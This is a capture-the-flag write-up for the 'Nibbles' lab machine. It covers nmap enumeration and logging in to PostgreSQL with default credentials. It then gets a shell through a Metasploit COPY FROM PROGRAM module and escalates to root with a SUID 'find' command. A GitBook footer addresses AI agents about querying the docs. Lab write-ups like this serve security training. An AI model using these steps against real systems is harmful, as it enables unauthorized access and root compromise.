> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/nibbles.md). # Nibbles ## Nmap ``` sudo nmap 192.168.51.47 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 139/tcp closed netbios-ssn 445/tcp closed microsoft-ds 5437/tcp open postgresql PostgreSQL DB 11.3 - 11.7 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` Port 5437 is running postgresql version between 11.3 - 11.7. I was able to login with the default credentials of `postgres:postgres` using `psql`. ``` psql -h 192.168.51.47 -U postgres -p 5437 ``` ![](/files/-MUxzijPPEUZJanoxOzx) As we are running on a version of postgresql higher than 9.3 we should be able to use the following exploit to gain command execution on the target machine. {% embed url="" %} **Description** *Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with 'pg\_execute\_server\_program' to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access.* *This module attempts to create a new table, then execute system commands in the context of copying the command output into the table.* *This module should work on all Postgres systems running version 9.3 and above.* *For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse\_perl* *For Windows Systems, target 2 is used with Powershell payloads such as: cmd/windows/powershell\_reverse\_tcp Alternativly target 3 can be used to execute generic commands, such as a web\_delivery meterpreter powershell payload or other customized command.* First ensure we are a superuser on postgresql: ``` SELECT current_setting('is_superuser'); ``` ![](/files/-MUy0LmyaYeoBrS2pAHc) As we are confirmed a superuser we can use the following `Metasploit` module to gain a shell. ``` use exploit/multi/postgres/postgres_copy_from_program_cmd_exec ``` ![](/files/-MUy0tcjMP2sV2kcz3bF) Execution: ![](/files/-MUy19SyCwuT7aPONqQ-) Checking for SUID and PATH we have a '.' at the end of path and SUID bit set for the find `binary`. ![](/files/-MUy23kgyWT-3jYa7heH) Knowing this we can attempt to gain privileges by exploiting the find binary. Checking [GTFOBins](https://gtfobins.github.io/gtfobins/find/#suid) shows we can escalate privileges: ![https://gtfobins.github.io/gtfobins/find/](/files/-MUy2Hd35ZHoWqU8TIJ9) Running the following will escalate privileges: ``` find . -exec /bin/sh -p \; -quit ``` ![](/files/-MUy2kogrjtptRX5OHM7) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/nibbles.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.